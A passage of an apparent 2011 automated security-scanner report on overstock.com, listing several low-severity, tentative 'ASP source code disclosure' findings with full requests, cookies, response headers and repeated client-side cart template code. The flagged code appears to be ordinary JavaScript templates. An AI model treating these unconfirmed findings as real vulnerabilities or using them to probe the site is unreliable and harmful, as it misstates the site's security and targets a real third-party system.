var warr = this.getOrderLevelWarrantOption(item.orderLevelWarrantyOptionId);
if(warr) { %>

<span class="pro-warranty"><%= warr.productName %>:
<span class="warranty">
...[SNIP]...
<% } %>
<% } else if(item.coverageDescription) { %>
<span class="pro-warranty">
...[SNIP]...
<span class="warranty"><%= item.coverageDescription %> <a href="<%= item.additionalInfoLink %>" target="_new">
...[SNIP]...
<ul>
                       <% for(var i=0, len = links.length; i < len; i++) {%>
                       <li>
...[SNIP]...
<a class="heading" target="_new" href="<%= links[i].clickUrl %>"><%= links[i].title %></a>
                               <%= links[i].desc %>
                               <span class="sitehost"><%= links[i].sitehost %></span>
...[SNIP]...

4.10. http://www.overstock.com/Home-Garden/Furniture/32/dept.html  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.overstock.com
Path:   /Home-Garden/Furniture/32/dept.html

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Home-Garden/Furniture/32/dept.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:42 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:42 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:42 GMT; Path=/
Set-Cookie: ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^Home-Garden/Furniture/32/dept.html|searchhistory^categories; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 272829

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<![CDATA[

<% if(typeof cart !== 'undefined') {

var cartItems = cart.cartItems,
cartQty = document.getElementById('mini-cart-qty'),
cartQtyOld = document.getElementById('cart-quantity');
/*update cart quantity*/
if(cartQty && cartQtyOld) {cartQty.innerHTML = cartQtyOld.innerHTML = (cart.totalQuantity < 100 ) ? cart.totalQuantity : '99+';}

%>


<div class="bd">
<% if(cartItems.length > 0 || failedAdditionItems.length > 0) { %>
<ul id="mini-cart-items">
<%
render( this.renderFailedAdditions() );
render( this.renderLineItems() );
%>

</ul>

<% if(cart.orderTotals) { %>
<dl id="mini-cart-totals">
<% var reFree = /free/i,
totals = [
{label: 'Subtotal', type: 'subtotal', prefix:'', className: 'subtotal'},
{label: 'Coupon Savings', type: 'couponSavings', prefix: '-', className: 'discount'},
{label: 'Promotional Savings', type: 'promotionalSavings', prefix: '-', className: 'discount', href: '/11407/static.html'},
{label: 'In-Store Credit', type: 'instoreCredit', prefix: '-'},
{label: 'Gift Cards', type: 'giftCardCredit', prefix: '-'},
{label: 'Club O Rewards', type: 'clubORedemptionAmount', prefix: '-', className: 'discount'},
{label: 'Shipping', type: 'shippingCharge', prefix: ''},
{label: 'Tax', type: 'tax', prefix: ''},
{label: 'Total', type: 'grandTotal', prefix: '', className: 'order-total'}
];

for(var i=0; i < totals.length; i++)
{
var item = totals[i], className;

item.total = cart.orderTotals[item.type];
if(reFree.test(item.total))
{
item.className = 'discount';
}
className = (item.className) ? 'class="' + item.className + '"' : '';

if(item.total){ %>

<dt <%= className %>><% render((item.href) ? '<a href="'+ item.href +'" class="colorbox" target="_new">'+ item.label +'</a>' : item.label); %>:</dt>
...[SNIP]...
<dd <%= className %>><% render(item.prefix + item.total); %></dd>
...[SNIP]...
</dl>

<% } else { %>
<div id="mini-cart-totals">
...[SNIP]...
<span class="value subtotal" style="color: #c02; font-weight: bold;"><%= cart.subtotal %></span>
...[SNIP]...
<!-- MINI_CART_PROMO_SUPRESSED -->

<% } else if (cartItems.length == 0) { %>
<p class="message empty">
...[SNIP]...
<div class="ft">
<% if(cartItems.length > 0) { %>
<a href="<%= cart.checkoutUrl.replace(/\?.*/,'?TID=CartLayer') %>" id="mini-cart-checkout" class="button" title="Checkout Now">
...[SNIP]...
<% } %>
<% if(typeof cart.editUrl !== 'undefined') { %>
<a href="<%= cart.editUrl %>" id="mini-cart-edit" class="button" title="Edit Cart">
...[SNIP]...
</div>
<% } else { %>
<div class="bd has-error">
...[SNIP]...
<![CDATA[
<%
var classNames = '';
if(item.recentlyAdded)
{
classNames += ' added';
}
if(item.warningMessages && item.warningMessages.length > 0)
{
classNames += ' has-warning';
}
%>

<% /*display a heading for all previous items only once, items with errors or warnings should be pushed to the top*/
if(!this.hasPreviouslyAddedHeading && !item.recentlyAdded && item.warningMessages.length == 0) { %>

<li>
...[SNIP]...
</li>
<% this.hasPreviouslyAddedHeading = true;} %>

<li class="mini-cart-item <%= classNames %>">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
<span <% if(item.priceAfterSiteSalePercentOff) render('class="was"'); %>><%= item.undiscountedPrice %></span>
...[SNIP]...
<span class="sale"><%= item.priceAfterSiteSalePercentOff %></span>
...[SNIP]...
<span class="quantity"><%= item.quantity %></span>
...[SNIP]...
</span>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<button id="remove-<%= item.optionId %>" class="ostk-button remove-button" title="Remove This Item">
...[SNIP]...
</button>

<% render( this.renderItemWarranty(item) ); %>
</div>
...[SNIP]...
<li class="mini-cart-item has-error">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
</a>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<![CDATA[

<%
var msgType = (item.errorMessages) ? 'errorMessages' : 'warningMessages';

if(item[msgType].length <= 0) { %>

<% if(item.recentlyAdded) { %>
<p class="message">
...[SNIP]...
<% } %>
<% } else { %>
<p class="message">
...[SNIP]...
</i>
<% for(var i=0; i < item[msgType].length; i++) { %>
<% if(i === 0) { %>
<%= item[msgType][i] %>
<% continue; } %>
<span class="sub-message"><%= item[msgType][i] %></span>
...[SNIP]...
<![CDATA[

<% if(item.warrantyDetail) { %>
<span class="pro-warranty"><%= item.warrantyDetail.productName %>:
<span class="warranty" title="<%= item.productName %>"><%= item.productName %></span>
...[SNIP]...
<a href="" id="remove-<%= item.warrantyDetail.optionId %>" class="remove-warranty-button">
...[SNIP]...
<span class="price"><%= item.warrantyDetail.undiscountedPrice %></span>
</span>
<% } else if (item.orderLevelWarrantyOptionId) {
var warr = this.getOrderLevelWarrantOption(item.orderLevelWarrantyOptionId);
if(warr) { %>

<span class="pro-warranty"><%= warr.productName %>:
<span class="warranty">
...[SNIP]...
<% } %>
<% } else if(item.coverageDescription) { %>
<span class="pro-warranty">
...[SNIP]...
<span class="warranty"><%= item.coverageDescription %> <a href="<%= item.additionalInfoLink %>" target="_new">
...[SNIP]...
<ul>
                       <% for(var i=0, len = links.length; i < len; i++) {%>
                       <li>
...[SNIP]...
<a class="heading" target="_new" href="<%= links[i].clickUrl %>"><%= links[i].title %></a>
                               <%= links[i].desc %>
                               <span class="sitehost"><%= links[i].sitehost %></span>
...[SNIP]...

4.11. http://www.overstock.com/Home-Garden/Furniture/Clearance,/clearance,/32/dept.html  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.overstock.com
Path:   /Home-Garden/Furniture/Clearance,/clearance,/32/dept.html

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Home-Garden/Furniture/Clearance,/clearance,/32/dept.html?sort=Top+Secret&TID=R:MOD_B HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:45 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:45 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:45 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session="sessstrt^1297527311612|csbshow^0|mxcshopmore^Home-Garden/Furniture/Clearance%2C/clearance%2C/32/dept.html%3Fsort%3DTop%2BSecret|searchhistory^categories,clearance"; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=48
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 234760

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<![CDATA[

<% if(typeof cart !== 'undefined') {

var cartItems = cart.cartItems,
cartQty = document.getElementById('mini-cart-qty'),
cartQtyOld = document.getElementById('cart-quantity');
/*update cart quantity*/
if(cartQty && cartQtyOld) {cartQty.innerHTML = cartQtyOld.innerHTML = (cart.totalQuantity < 100 ) ? cart.totalQuantity : '99+';}

%>


<div class="bd">
<% if(cartItems.length > 0 || failedAdditionItems.length > 0) { %>
<ul id="mini-cart-items">
<%
render( this.renderFailedAdditions() );
render( this.renderLineItems() );
%>

</ul>

<% if(cart.orderTotals) { %>
<dl id="mini-cart-totals">
<% var reFree = /free/i,
totals = [
{label: 'Subtotal', type: 'subtotal', prefix:'', className: 'subtotal'},
{label: 'Coupon Savings', type: 'couponSavings', prefix: '-', className: 'discount'},
{label: 'Promotional Savings', type: 'promotionalSavings', prefix: '-', className: 'discount', href: '/11407/static.html'},
{label: 'In-Store Credit', type: 'instoreCredit', prefix: '-'},
{label: 'Gift Cards', type: 'giftCardCredit', prefix: '-'},
{label: 'Club O Rewards', type: 'clubORedemptionAmount', prefix: '-', className: 'discount'},
{label: 'Shipping', type: 'shippingCharge', prefix: ''},
{label: 'Tax', type: 'tax', prefix: ''},
{label: 'Total', type: 'grandTotal', prefix: '', className: 'order-total'}
];

for(var i=0; i < totals.length; i++)
{
var item = totals[i], className;

item.total = cart.orderTotals[item.type];
if(reFree.test(item.total))
{
item.className = 'discount';
}
className = (item.className) ? 'class="' + item.className + '"' : '';

if(item.total){ %>

<dt <%= className %>><% render((item.href) ? '<a href="'+ item.href +'" class="colorbox" target="_new">'+ item.label +'</a>' : item.label); %>:</dt>
...[SNIP]...
<dd <%= className %>><% render(item.prefix + item.total); %></dd>
...[SNIP]...
</dl>

<% } else { %>
<div id="mini-cart-totals">
...[SNIP]...
<span class="value subtotal" style="color: #c02; font-weight: bold;"><%= cart.subtotal %></span>
...[SNIP]...
<!-- MINI_CART_PROMO_SUPRESSED -->

<% } else if (cartItems.length == 0) { %>
<p class="message empty">
...[SNIP]...
<div class="ft">
<% if(cartItems.length > 0) { %>
<a href="<%= cart.checkoutUrl.replace(/\?.*/,'?TID=CartLayer') %>" id="mini-cart-checkout" class="button" title="Checkout Now">
...[SNIP]...
<% } %>
<% if(typeof cart.editUrl !== 'undefined') { %>
<a href="<%= cart.editUrl %>" id="mini-cart-edit" class="button" title="Edit Cart">
...[SNIP]...
</div>
<% } else { %>
<div class="bd has-error">
...[SNIP]...
<![CDATA[
<%
var classNames = '';
if(item.recentlyAdded)
{
classNames += ' added';
}
if(item.warningMessages && item.warningMessages.length > 0)
{
classNames += ' has-warning';
}
%>

<% /*display a heading for all previous items only once, items with errors or warnings should be pushed to the top*/
if(!this.hasPreviouslyAddedHeading && !item.recentlyAdded && item.warningMessages.length == 0) { %>

<li>
...[SNIP]...
</li>
<% this.hasPreviouslyAddedHeading = true;} %>

<li class="mini-cart-item <%= classNames %>">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
<span <% if(item.priceAfterSiteSalePercentOff) render('class="was"'); %>><%= item.undiscountedPrice %></span>
...[SNIP]...
<span class="sale"><%= item.priceAfterSiteSalePercentOff %></span>
...[SNIP]...
<span class="quantity"><%= item.quantity %></span>
...[SNIP]...
</span>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<button id="remove-<%= item.optionId %>" class="ostk-button remove-button" title="Remove This Item">
...[SNIP]...
</button>

<% render( this.renderItemWarranty(item) ); %>
</div>
...[SNIP]...
<li class="mini-cart-item has-error">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
</a>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<![CDATA[

<%
var msgType = (item.errorMessages) ? 'errorMessages' : 'warningMessages';

if(item[msgType].length <= 0) { %>

<% if(item.recentlyAdded) { %>
<p class="message">
...[SNIP]...
<% } %>
<% } else { %>
<p class="message">
...[SNIP]...
</i>
<% for(var i=0; i < item[msgType].length; i++) { %>
<% if(i === 0) { %>
<%= item[msgType][i] %>
<% continue; } %>
<span class="sub-message"><%= item[msgType][i] %></span>
...[SNIP]...
<![CDATA[

<% if(item.warrantyDetail) { %>
<span class="pro-warranty"><%= item.warrantyDetail.productName %>:
<span class="warranty" title="<%= item.productName %>"><%= item.productName %></span>
...[SNIP]...
<a href="" id="remove-<%= item.warrantyDetail.optionId %>" class="remove-warranty-button">
...[SNIP]...
<span class="price"><%= item.warrantyDetail.undiscountedPrice %></span>
</span>
<% } else if (item.orderLevelWarrantyOptionId) {
var warr = this.getOrderLevelWarrantOption(item.orderLevelWarrantyOptionId);
if(warr) { %>

<span class="pro-warranty"><%= warr.productName %>:
<span class="warranty">
...[SNIP]...
<% } %>
<% } else if(item.coverageDescription) { %>
<span class="pro-warranty">
...[SNIP]...
<span class="warranty"><%= item.coverageDescription %> <a href="<%= item.additionalInfoLink %>" target="_new">
...[SNIP]...
<ul>
                       <% for(var i=0, len = links.length; i < len; i++) {%>
                       <li>
...[SNIP]...
<a class="heading" target="_new" href="<%= links[i].clickUrl %>"><%= links[i].title %></a>
                               <%= links[i].desc %>
                               <span class="sitehost"><%= links[i].sitehost %></span>
...[SNIP]...

4.12. http://www.overstock.com/Home-Garden/Furniture/Simmons,/brand,/32/dept.html  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.overstock.com
Path:   /Home-Garden/Furniture/Simmons,/brand,/32/dept.html

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Home-Garden/Furniture/Simmons,/brand,/32/dept.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:28:45 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:28:45 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session="sessstrt^1297527311612|csbshow^0|mxcshopmore^Home-Garden/Furniture/Simmons%2C/brand%2C/32/dept.html|searchhistory^categories,brand"; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:28:45 GMT; Path=/
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 167181

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<![CDATA[

<% if(typeof cart !== 'undefined') {

var cartItems = cart.cartItems,
cartQty = document.getElementById('mini-cart-qty'),
cartQtyOld = document.getElementById('cart-quantity');
/*update cart quantity*/
if(cartQty && cartQtyOld) {cartQty.innerHTML = cartQtyOld.innerHTML = (cart.totalQuantity < 100 ) ? cart.totalQuantity : '99+';}

%>


<div class="bd">
<% if(cartItems.length > 0 || failedAdditionItems.length > 0) { %>
<ul id="mini-cart-items">
<%
render( this.renderFailedAdditions() );
render( this.renderLineItems() );
%>

</ul>

<% if(cart.orderTotals) { %>
<dl id="mini-cart-totals">
<% var reFree = /free/i,
totals = [
{label: 'Subtotal', type: 'subtotal', prefix:'', className: 'subtotal'},
{label: 'Coupon Savings', type: 'couponSavings', prefix: '-', className: 'discount'},
{label: 'Promotional Savings', type: 'promotionalSavings', prefix: '-', className: 'discount', href: '/11407/static.html'},
{label: 'In-Store Credit', type: 'instoreCredit', prefix: '-'},
{label: 'Gift Cards', type: 'giftCardCredit', prefix: '-'},
{label: 'Club O Rewards', type: 'clubORedemptionAmount', prefix: '-', className: 'discount'},
{label: 'Shipping', type: 'shippingCharge', prefix: ''},
{label: 'Tax', type: 'tax', prefix: ''},
{label: 'Total', type: 'grandTotal', prefix: '', className: 'order-total'}
];

for(var i=0; i < totals.length; i++)
{
var item = totals[i], className;

item.total = cart.orderTotals[item.type];
if(reFree.test(item.total))
{
item.className = 'discount';
}
className = (item.className) ? 'class="' + item.className + '"' : '';

if(item.total){ %>

<dt <%= className %>><% render((item.href) ? '<a href="'+ item.href +'" class="colorbox" target="_new">'+ item.label +'</a>' : item.label); %>:</dt>
...[SNIP]...
<dd <%= className %>><% render(item.prefix + item.total); %></dd>
...[SNIP]...
</dl>

<% } else { %>
<div id="mini-cart-totals">
...[SNIP]...
<span class="value subtotal" style="color: #c02; font-weight: bold;"><%= cart.subtotal %></span>
...[SNIP]...
<!-- MINI_CART_PROMO_SUPRESSED -->

<% } else if (cartItems.length == 0) { %>
<p class="message empty">
...[SNIP]...
<div class="ft">
<% if(cartItems.length > 0) { %>
<a href="<%= cart.checkoutUrl.replace(/\?.*/,'?TID=CartLayer') %>" id="mini-cart-checkout" class="button" title="Checkout Now">
...[SNIP]...
<% } %>
<% if(typeof cart.editUrl !== 'undefined') { %>
<a href="<%= cart.editUrl %>" id="mini-cart-edit" class="button" title="Edit Cart">
...[SNIP]...
</div>
<% } else { %>
<div class="bd has-error">
...[SNIP]...
<![CDATA[
<%
var classNames = '';
if(item.recentlyAdded)
{
classNames += ' added';
}
if(item.warningMessages && item.warningMessages.length > 0)
{
classNames += ' has-warning';
}
%>

<% /*display a heading for all previous items only once, items with errors or warnings should be pushed to the top*/
if(!this.hasPreviouslyAddedHeading && !item.recentlyAdded && item.warningMessages.length == 0) { %>

<li>
...[SNIP]...
</li>
<% this.hasPreviouslyAddedHeading = true;} %>

<li class="mini-cart-item <%= classNames %>">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
<span <% if(item.priceAfterSiteSalePercentOff) render('class="was"'); %>><%= item.undiscountedPrice %></span>
...[SNIP]...
<span class="sale"><%= item.priceAfterSiteSalePercentOff %></span>
...[SNIP]...
<span class="quantity"><%= item.quantity %></span>
...[SNIP]...
</span>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<button id="remove-<%= item.optionId %>" class="ostk-button remove-button" title="Remove This Item">
...[SNIP]...
</button>

<% render( this.renderItemWarranty(item) ); %>
</div>
...[SNIP]...
<li class="mini-cart-item has-error">
<% render( this.renderMessage(item) ); %>
<div class="mini-cart-item-content">
...[SNIP]...
<a href="<%= item.productUrl %>" title="<%= item.productName %>">
...[SNIP]...
<img class="pro-thumb" width="60" height="60" src="<%= item.thumbnailUrl %>" alt="<%= item.productName %>">
...[SNIP]...
<span class="pro-name"><%= item.productName %></span>
...[SNIP]...
</a>
<% if(item.optionName) { %>
<span class="pro-options">
...[SNIP]...
<span class="options" title="<%= item.optionName %>"><%= item.optionName %></span>
...[SNIP]...
<![CDATA[

<%
var msgType = (item.errorMessages) ? 'errorMessages' : 'warningMessages';

if(item[msgType].length <= 0) { %>

<% if(item.recentlyAdded) { %>
<p class="message">
...[SNIP]...
<% } %>
<% } else { %>
<p class="message">
...[SNIP]...
</i>
<% for(var i=0; i < item[msgType].length; i++) { %>
<% if(i === 0) { %>
<%= item[msgType][i] %>
<% continue; } %>
<span class="sub-message"><%= item[msgType][i] %></span>
...[SNIP]...
<![CDATA[

<% if(item.warrantyDetail) { %>
<span class="pro-warranty"><%= item.warrantyDetail.productName %>:
<span class="warranty" title="<%= item.productName %>"><%= item.productName %></span>
...[SNIP]...
<a href="" id="remove-<%= item.warrantyDetail.optionId %>" class="remove-warranty-button">
...[SNIP]...
<span class="price"><%= item.warrantyDetail.undiscountedPrice %></span>
</span>
<% } else if (item.orderLevelWarrantyOptionId) {
var warr = this.getOrderLevelWarrantOption(item.orderLevelWarrantyOptionId);
if(warr) { %>

<span class="pro-warranty"><%= warr.productName %>:
<span class="warranty">
...[SNIP]...
<% } %>
<% } else if(item.coverageDescription) { %>
<span class="pro-warranty">
...[SNIP]...
<span class="warranty"><%= item.coverageDescription %> <a href="<%= item.additionalInfoLink %>" target="_new">
...[SNIP]...
<ul>
                       <% for(var i=0, len = links.length; i < len; i++) {%>
                       <li>
...[SNIP]...
<a class="heading" target="_new" href="<%= links[i].clickUrl %>"><%= links[i].title %></a>
                               <%= links[i].desc %>
                               <span class="sitehost"><%= links[i].sitehost %></span>
...[SNIP]...

4.13. http://www.overstock.com/Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.overstock.com
Path:   /Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /Home-Garden/Mira-8-way-Hand-tied-Paisley-Arm-Chair-and-Ottoman/3348501/product.html HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcgotoast=; mxcsurftype=4; mxclastvisit=20110212; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^5731442606501422080|csbtmst^|csbcrt^|csbsfl^|mxcskupage^120|pageresult^120|country^US|currency^USD|language^en; ostk_aggr_session=sessstrt^1297527311612|csbshow^0|mxcshopmore^http://www.overstock.com/; ostk_campaign=; mbox=check#true#1297527454|session#1297527393397-20879#1297529254|PC#1297527393397-20879.17#1298736995; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Repeat%2520Untracked%7C1297529195100%3B; cinfo=ccnt^0:ctmst^1297527311613; se_list=se_list^0|4|;

Response

HTTP/1.1 200 OK
Date: Sat, 12 Feb 2011 16:30:01 GMT
Server: Apache
Expires: Sat, 12 Feb 2011 16:30:01 GMT
Pragma: no-cache
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=3348501|; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:01 GMT; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=4; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20110212; Domain=.overstock.com; Expires=Sun, 12-Feb-2012 16:30:01 GMT; Path=/
Keep-Alive: timeout=5, max=74
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Cache-Control: no-cache, no-store
Content-Type: text/html;charset=iso-8859-1
Content-Length: 137761

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Copyright 2009 Overstock.com --
...[SNIP]...
<![CDATA[

<% if(typeof cart !== 'undefined') {

var cartItems = cart.cartItems,
cartQty = document.getElementById('mini-cart-qty'),
cartQtyOld = document.getElementById('cart-quantity');
/*update cart quantity*/
